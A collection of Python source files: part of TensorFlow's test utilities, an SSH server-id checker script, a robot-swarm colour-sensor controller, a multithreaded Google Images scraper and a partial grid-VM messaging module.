raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful to test tf.gradients() in tests that uses tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function to run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
|
check-serverid.py
|
import os
import app
import json
import threading
def real_path(file_name):
return os.path.dirname(os.path.abspath(__file__)) + file_name
def main():
app.log('Checking serverid', status=None)
data_create_ssh_temp = [
{
"link": "",
"head": "",
"post": "",
"page": "",
"pattern-class": "",
"pattern-serverid": "",
"pattern-hostname": "",
"replace-username": "",
"replace-password": ""
}
]
ssh_create = app.ssh_create(verbose=True)
ssh_create.accounts = app.generate_accounts(json.loads(open(real_path('/database/accounts.json')).read())['accounts'])
# ssh_create.data_create_ssh = data_create_ssh_temp
threads = []
for data in ssh_create.data_create_ssh:
threads.append(threading.Thread(target=ssh_create.update_serverid_thread, args=(data, )))
for thread in threads:
thread.daemon = True
thread.start()
try:
for thread in threads:
thread.join()
except KeyboardInterrupt: pass
app.log('Checking serverid complete \n', status=None)
if __name__ == '__main__':
main()
|
SwarmMaster.py
|
from hardware.communication.ZMQ import ZMQExchange
from hardware.communication.TCP import TCP
from threading import Thread
from peripherals.colorsensor import ColorSensor
import time
threads = []
count = {"F":0,"B":0,"L":0,"R":0}
def run(bot):
# Sets up TCP connection between master and minions. Starts publisher-side
# connection.
# always set the mediator first
z = ZMQExchange()
z.setMediator()
z.setBroadcaster()
TCP.tcp.send_to_basestation("SwarmIP", z.getIP("wlan0"))
mediateThread = Thread(target=z.mediate)
mediateThread.start()
threads.append(mediateThread)
#echobot(bot,z)
colorbot(bot,z)
def colorbot(bot,z):
speed = 10
cs = bot.get_sensor_by_name("ColorSensor")
cs.calibrate()
pinkFirstTime = True
orangeFirstTime = True
try:
while(True):
c = cs.read_color()
if(c=="RED"):
# stop
msg = (0,0)
count["F"]=0
count["B"]=0
count["L"]=0
count["R"]=0
speed = 10
elif(c=="GREEN"):
# forwards
count["F"]+=1
count["B"]=0
count["L"]=0
count["R"]=0
speed = increment_speed("F",3,speed,15)
msg = (speed,speed)
elif(c=="BLUE"):
# backwards
count["F"]=0
count["B"]+=1
count["L"]=0
count["R"]=0
speed = increment_speed("B",3,speed,15)
msg = (-speed,-speed)
elif(c=="YELLOW"):
# turn left
count["F"]=0
count["B"]=0
count["L"]+=1
count["R"]=0
speed = increment_speed("L",3,speed,15)
msg = (-speed,speed)
elif(c=="VIOLET"):
# turn right
count["F"]=0
count["B"]=0
count["L"]=0
count["R"]+=1
speed = increment_speed("R",3,speed,15)
msg = (speed,-speed)
z.broadcast(msg)
time.sleep(0.2)
finally:
cleanup(z)
def increment_speed(direction, inc_time, speed, inc_amt):
""" Given a direction, increments the speed after inc_time amount of seconds by
inc_amt increase of power to the motors.
"""
if(count[direction]>(inc_time*5)):
count[direction] = 0
if(speed<50):
speed += inc_amt
print("Speed increased: " + str(speed))
return speed
def echobot(bot,z):
try:
while(True):
# msg is a tuple of left motor and right motor, respectively.
msg = bot.get_actuator_by_name("two_wheel_movement").get_value()
print("MSG: " + msg)
z.broadcast(msg)
time.sleep(0.1)
if not TCP.tcp.isConnected():
break
finally:
cleanup(z)
def cleanup(z):
for t in threads:
t.join(0.1)
z.stopZMQExchange()
|
batch_it_crazy.py
|
# In[ ]:
# coding: utf-8
###### Searching and Downloading Google Images to the local disk ######
# Import Libraries
import time # Importing the time library to check the time of code execution
import sys # Importing the System Library
import os
import argparse
import ssl
import pathlib
import traceback
import requests
from bs4 import BeautifulSoup
from threading import Thread
import threading
from queue import Queue
import datetime
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
# urllib library for Extracting web pages
from urllib.request import Request, urlopen
from urllib.request import URLError, HTTPError
from urllib.parse import quote
else: # If the Current Version of Python is 2.x
# urllib library for Extracting web pages
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
from urllib import quote
import urllib2
link_queue = Queue()
data_write_queue = Queue(maxsize=1000)
url_params = {'color':
{'gray':'ic:gray',
'rgb':'ic:color'},
'usage_rights':
{'labled-for-reuse-with-modifications':'sur:fmc','labled-for-reuse':'sur:fc',
'labled-for-noncommercial-reuse-with-modification':'sur:fm',
'labled-for-nocommercial-reuse':'sur:f'},
'size':
{'large':'isz:l',
'medium':'isz:m',
'icon':'isz:i'},
'type':
{'face':'itp:face',
'photo':'itp:photo',
'clip-art':'itp:clip-art',
'line-drawing':'itp:lineart',
'animated':'itp:animated'},
'time':{'past-24-hours':'qdr:d',
'past-7-days':'qdr:w'}
}
# Downloading entire Web Document (Raw Page Content)
def download_page(url):
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
import urllib.request # urllib library for Extracting web pages
try:
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: # If the Current Version of Python is 2.x
try:
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers=headers)
try:
response = urllib2.urlopen(req)
except URLError: # Handling SSL certificate failed
context = ssl._create_unverified_context()
response = urlopen(req, context=context)
page = response.read()
return page
except:
return "Page Not found"
def _download_page(url):
req = requests.get(url)
html = req.content
return html.encode('utf-8')
def _fetch_image_links(html):
soup = BeautifulSoup(html, 'html.parser')
links = soup.find_all('a', href=True)
links = [a['href'] for a in links]
return links
# Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"', start_line + 1)
end_content = s.find(',"ow"', start_content + 1)
content_raw = str(s[start_content + 6:end_content - 1])
return content_raw, end_content
# Getting all links with the help of '_images_get_next_image'
def _images_get_all_links(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) # Append all the links in the list named 'Links'
time.sleep(0.1) # Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
#Building URL parameters
def build_url_parameters(**kwargs):
built_url = "&tbs="
params = []
for key, value in kwargs.items():
param = url_params[key][value]
params.append(param)
return '%tbs=%s' + ','.join(params)
# build the URL for Google
def _build_url(search_term, engine='google', params=''):
url = 'https://www.google.com/search?q={0}&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch{1}&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
# add the keyword to the URL
url = url.format(search_term, params)
return url
def type_check(v, o):
if not isinstance(v, o):
# get the stack trace so we can get the name of the variable
stack = traceback.extract_stack()
# get the name of this function (just in case it gets changed in the future)
(_, _, function_name, _) = stack[-1]
# get the text that was typed for this call
(_, _, _, text) = stack[-2]
# parse the variable names from the text
# - now it's "type_check(my_var, str)"
# - but can be "x = [type_check(y, int) for y in my_list]"
# - so we need to make the string parsing robust to account for the variations
vars = text.split('%s(' % function_name)[1]
vars = [var.strip() for var in vars.split(')')[0].split(',')]
var_name = vars[0]
type_name = vars[1]
# now we get to raise the error... finally!
raise ValueError('Invalid type: Variable "{}" must be of type {}.'.format(var_name, type_name))
def _build_urls(keywords, addendums, **kwargs):
urls = []
params = build_url_parameters(**kwargs)
for category, terms in keywords.items():
# build keywords + addendums and create all their URLs
for term in terms:
search_terms = [('"%s": %s' % (addendum, term)).replace(':', '%3A').replace(' ', '+') for addendum in addendums]
_urls = [_build_url(search_term, params=params) for search_term in search_terms]
_urls = [(category, url) for url in _urls]
urls += _urls
return urls
def _get_all_links(url_batch, verbose=False):
links = {}
t_name = threading.current_thread().name
for category, url in url_batch:
# fetch html
html = download_page(url)
new_links = _images_get_all_links(html)
num_links_added = 0
# this makes sure that all the links are unique
for link in new_links:
if link not in links:
num_links_added += 1
links = {value for value in list(links) + [link]}
link_queue.put((category, links))
link_queue.task_done()
if verbose:
print('%s [%s]: %d links added' % (t_name, category, num_links_added))
def _get_unique_links(kw_links, cross_filter, verbose=False):
t_name = threading.current_thread().name
category_links = {}
filtered_category_links = []
num_links_removed = 0
for category, links in kw_links:
if category not in category_links:
category_links[category] = {}
for link in links:
if link not in category_links[category]:
category_links[category][link] = 1
else:
category_links[category][link] += 1
# perform category cross-filtering
if cross_filter == 'None':
for category in category_links.keys():
for link in category_links[category].keys():
filtered_category_links.append((category, link))
elif cross_filter == 'Count':
categories = list(category_links.keys())
for i, category in enumerate(categories[:-1]):
other_categories = categories[i + 1:]
# iterate over each link in this category
for curr_link, curr_link_count in category_links[category].items():
keep_link = True
# iterate over each other category and look for this link
for other_category in other_categories:
if curr_link in category_links[other_category]:
other_link_count = category_links[other_category][curr_link]
# LOSE: dont keep this link
if curr_link_count < other_link_count:
keep_link = False
num_links_removed += 1
break
# TIE: dont keep any links
elif curr_link_count == other_link_count:
del category_links[other_category][curr_link]
keep_link = False
num_links_removed += 2
break
# WIN: remove the other link
else:
num_links_removed += 1
del category_links[other_category][curr_link]
if keep_link:
filtered_category_links.append((category, curr_link))
elif cross_filter == 'Strict':
categories = list(category_links.keys())
for i, category in enumerate(categories[:-1]):
other_categories = categories[i + 1:]
# iterate over each link in this category
for link in category_links[category].keys():
keep_link = True
# iterate over each other category and look for this link
for other_category in other_categories:
if link in category_links[other_category]:
keep_link = False
del category_links[other_category][link]
num_links_removed += 2
if keep_link:
filtered_category_links.append((category, link))
else:
raise ValueError('\'{}\': Invalid argument for cross_filter parameter.'.format(cross_filter))
if verbose:
print('%s cross_filter=%s: %d links removed' % (t_name, cross_filter, num_links_removed))
return filtered_category_links
def _write_data_thread(verbose=False):
t_name = threading.current_thread().name
while True:
directory, data = data_write_queue.get()
file_id = len(os.listdir(directory))
filename = '%d.jpg' % file_id
filename = os.path.join(directory, filename)
output_file = open(filename, 'wb')
output_file.write(data)
output_file.close()
data_write_queue.task_done()
if verbose:
print('%s >>> [%s] file %d written!' % (t_name, os.path.basename(directory), file_id))
def _fetch_images(links, out_dir, log_out_dir, verbose=False):
t_name = threading.current_thread().name
log_filename = time.strftime('log-{} %d-%m-%Y %H-%M.txt', time.localtime()).format(t_name)
log_filename = os.path.join(log_out_dir, log_filename)
logfile = open(log_filename, 'w')
logfile.write('Image Count,Status,Url,FileName,Message\n')
supported_formats = ('.jpg', '.jpeg', '.png', '.svg')
for i, (category, link) in enumerate(links):
image_name = ''
try:
req = Request(link, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req, None, 15)
image_name = str(link[(link.rfind('/')) + 1:])
if '?' in image_name:
image_name = image_name[:image_name.find('?')]
ext = os.path.splitext(image_name)[-1]
if ext in supported_formats:
# get data stream
data = response.read()
category_dir = os.path.join(out_dir, category)
data_write_queue.put((category_dir, data))
#write_queue.task_done()
response.close()
log_message = '%d,downloaded,%s,%s,\n' % (i+1, link, image_name)
if verbose:
print('%s (%d) downloaded: %s' % (t_name, i+1, image_name))
else:
log_message = "%d,Exception,,,InvalidExtension: '%s' is not a supported image format. Supported formats %s\n" \
% (i+1, ext, str(supported_formats))
if verbose:
print('%s (%d) [Exception] UnsupportedExtension: %s' % (t_name, i+1, ext))
except Exception as e:
error_name = str(type(e)).split('\'')[1]
error_message = str(e)
image_name = 'N/A' if image_name == '' else image_name
log_message = "%d,Exception,%s,%s,%s: %s\n" % (i, link, image_name, error_name, error_message)
if verbose:
print('%s (%d) [Exception] %s: %s' % (t_name, i+1, error_name, error_message))
print('\tLink: %s\n\tImg Name: %s' % (link, image_name))
logfile.write(log_message)
logfile.close()
def _create_batches(data, num_batches=20):
type_check(data, list)
num_threads = min(num_batches, len(data))
batch_size = int(len(data) / num_threads)
batches = []
while len(data) > 0:
batch = data[:batch_size]
data = data[batch_size:]
batches.append(batch)
return batches
def go_go_batch_it(keywords, addendums=None, out_dir='output', log_out_dir='logs',
verbose=False, num_threads=20, cross_filter='Count', **kwargs):
if verbose:
print('initializing Batch-It')
print('validating parameters...')
# init_time
init_t = time.time()
output_dirs = {}
# check that the out_dir is a path
if not os.path.isdir(out_dir):
raise ValueError('Invalid Argument: Variable "out_dir" must be a directory.')
for key in keywords.keys():
d = os.path.join(out_dir, key)
if not os.path.isdir(d):
os.mkdir(d)
output_dirs[d] = len(os.listdir(d))
if not os.path.isdir(log_out_dir):
os.mkdir(log_out_dir)
# check that the keyword parameter is of type list
type_check(keywords, dict)
for key, value in keywords.items():
type_check(key, str)
type_check(value, list)
for elem in value:
type_check(elem, str)
# verify cross_filter
if cross_filter not in ('None', 'Count', 'Strict'):
err_message = '\'{}\': Invalid argument for cross_filter. Must be one of {}'.format(cross_filter, ('None', 'Count', 'Strict'))
raise ValueError(err_message)
# repeate the checking process for addendumns if it's not None
if addendums is not None:
type_check(addendums, list)
for addendum_elems in addendums:
type_check(addendum_elems, str)
else:
# this makes it easier for later
addendums = []
if verbose:
print('%d categories found' % len(keywords.keys()))
print('building urls...')
urls = _build_urls(keywords, addendums)
batches = _create_batches(urls, num_batches=num_threads)
# spin up threads to get ALL UNIQUE LINKS (this is unique per category)
if verbose:
print('%d urls created' % len(urls))
print('spinning up LinkFetcher threads...')
threads = [Thread(target=_get_all_links, name='t-[LinkFetcher %d]' % (i+1), args=(batch, verbose))
for i, batch in enumerate(batches)]
for t in threads:
if verbose:
print('starting %s' % t.name)
t.start()
for t in threads:
t.join()
links = []
while not link_queue.empty():
links.append(link_queue.get())
# _get_unique_links & cross_filter will compare links between categories
# cross_filter='None' will not perform any cross-category filtering
# cross_filter='Count' will filter out links in categories if their link count is lower than anothers
# cross_filer='Strict' will through out any links which are present in 2 or more categories
links = _get_unique_links(links, cross_filter=cross_filter, verbose=verbose)
if verbose:
print('%d links found' % len(links))
print('batching links & spinning up download threads...')
# Now batch up the links
batches = _create_batches(links, num_threads)
# create write thread
write_t = Thread(target=_write_data_thread, name='t-[write]', args=(verbose,))
write_t.start()
# create threads to fetch images
threads = [Thread(target=_fetch_images, name='t-[Downloader %d]' % (i+1), args=(batch, out_dir, log_out_dir,verbose))
for i, batch in enumerate(batches)]
for t in threads:
if verbose:
print('starting %s' % t.name)
t.start()
for t in threads:
t.join()
data_write_queue.join()
link_queue.join()
final_t = time.time()
if verbose:
total_t = int((final_t - init_t))
total_files_written = 0
for d, original_count in output_dirs.items():
new_count = len(os.listdir(d))
new_item_count = new_count - original_count
total_files_written += new_item_count
output_dirs[d] = new_item_count
print('done!')
print('----------------------------')
print('Summary:')
print('Total Num. Files Saved: %d' % total_files_written)
print('Total Time : %d' % total_t)
print('Files / Second : %.2ff/s' % (float(total_files_written) / total_t))
print('Files by Category:')
for d, count in output_dirs.items():
print('\t%s: %d' % (os.path.basename(d), count))
# start of main program
if __name__ == '__main__':
import argparse
import json
parser = argparse.ArgumentParser()
parser.add_argument('--search_args_path', type=str, required=True,
help='Search Arguments JASON: \n'
'\t{\'keywords\': {category_label: [search terms]},'
'\t \'addendums\': [additional attributes]}')
parser.add_argument('--out_dir', type=str, required=False,
help='Directory for outputs',
default='output')
parser.add_argument('--log_out_dir', type=str, required=False,
help='Output directory for log files',
default='logs')
parser.add_argument('--verbose', type=bool, required=False,
help='Display verbose info to std.out',
default=False)
parser.add_argument('--num_threads', type=int, required=False,
help='Max number of threads to run',
default=20)
parser.add_argument('--cross_filter', type=str, required=False,
help='Type of cross-category filtering. This helps reduce number of duplicate images copied '
'to different categories. Types=(None, Count, Strict)',
default='Count')
parser.add_argument('--color', type=str, required=False, default='rgb')
parser.add_argument('--type', type=str, required=False, default=None)
args = parser.parse_args()
search_data = json.load(open(args.search_args_path))
keywords = search_data['keywords']
addendums = search_data['addendums']
imcolor = args.color
imtype = args.type
go_go_batch_it(keywords, addendums,
out_dir=args.out_dir,
log_out_dir=args.log_out_dir,
verbose=args.verbose,
num_threads=args.num_threads,
cross_filter=args.cross_filter,
color=imcolor,
type=imtype)
|
communication.py
|
from queue import Queue, Empty
from threading import Thread, Semaphore
from gridvm.network.nethandler import NetHandler
from gridvm.network.protocol.packet import PacketType
from gridvm.network.protocol.packet import Packet
from gridvm.network.protocol.packet import make_packet
class EchoCommunication:
def __init__(self, *args, **kwargs):
self._messages = {}
def receive_message(self, who):
queue = self._messages.setdefault(who, list())
try:
return queue.pop()
except IndexError:
return None
def send_message(self, to, what):
queue = self._messages.setdefault(to, list())
queue.insert(0, what)
def update_thread_location(*args, **kwargs):
pass
def can_receive_message(self, who):
queue = self._messages.setdefault(who, list())
return len(queue) > 0
def shutdown(self):
pass
class NetworkCommunication:
def __init__(self, runtime_id, net_interface):
self.runtime_id = runtime_id
self._messages = { } # Messages that have arrived for threads
self._sent_messages = [ ] # Messages that have been sent over the network
self._fwd_table = { } # Forwarding table <pid, tid> -> <runtime_id>
self._print_req = Queue()
self._status_req = Queue()
self._to_send = Queue() # Packets that should be send over network (runtime_id, packet)
self._migration_req = Queue()
self._sem = Semaphore(value=0)
self._migrate_sucess = False
self.nethandler = NetHandler(self, runtime_id, net_interface)
# Start NetHandler
self.nethandler_thread = Thread(target=self.nethandler.start)
self.nethandler_thread.start()
def receive_message(self, sender, recv):
""" Called from Runtime to receive a message destined for a thread
Parameters:
-- thread_uid: (program_id, thread_id)
"""
# Create queue if not exist
queue = self._messages.setdefault( (recv, sender), Queue())
try:
return queue.get(block=False)
except Empty:
return None
def receive_all_messages(self, thread_uid):
""" Called from Runtime to receive all pending messages destined for a thread
Parameters:
-- thread_uid: (program_id, thread_id)
Returns:
-- List of messages, or an empty list if no messages in buffer
"""
messages = { }
for (recv, sender) in self._messages:
#print( (recv, sender) , self._messages[(recv, sender)].empty() )
if recv == thread_uid:
messages[(recv, sender)] = [ ]
while True:
msg = self.receive_message(sender, recv)
#print(msg)
if msg == None:
break
messages[(recv, sender)].append(msg)
if not messages[(recv, sender)]:
del messages[(recv, sender)]
return messages
def can_receive_message(self, sender, recv):
""" Called from Runtime to check if a message is pending for a thread
Parameters:
-- thread_uid: (program_id, thread_id)
"""
queue = self._messages.setdefault( (recv, sender), Queue())
if not queue.empty():
return True
# Check if a message was sent over the network
if (recv, sender) in self._sent_messages:
#print('Found sent message: {} -> {}'.format(sender, recv))
self._sent_messages.remove( (recv, sender) )
return True
return False
def send_message(self, recv, sender, msg):
""" Called from Runtime to send a message to another thread (same program)
Parameters:
-- thread_uid: (program_id, thread_id)
-- msg: message to send
"""
runtime_id = self._get_runtime_id(recv)
if runtime_id == self.runtime_id:
# Simply add to local message queue
queue = self._messages.setdefault((recv, sender), Queue())
queue.put(msg)
else:
packet = make_packet(
PacketType.THREAD_MESSAGE,
recv=recv,
sender=sender,
msg=msg
)
self._to_send.put( (runtime_id, packet) )
# Add to sent_messages
#print('Add {}:{}'.format(recv, sender))
self._sent_messages.append( (recv, sender) )
def add_thread_message(self, packet):
""" Called from NetHandler to add a new thread message which has arrived """
sender, recv, msg = packet['sender'], packet['recv'], packet['msg']
# Add the message to the queue
queue = self._messages.setdefault( (recv, sender), Queue())
queue.put(msg)
def restore_messages(self, thread_uid, messages):
""" Called from runtime to restore pending messages """
#print(messages)
for (recv, sender) in messages:
queue = self._messages.setdefault( (recv, sender), Queue())
for msg in messages[(recv, sender)]:
queue.put(msg)
def get_print_requests(self):
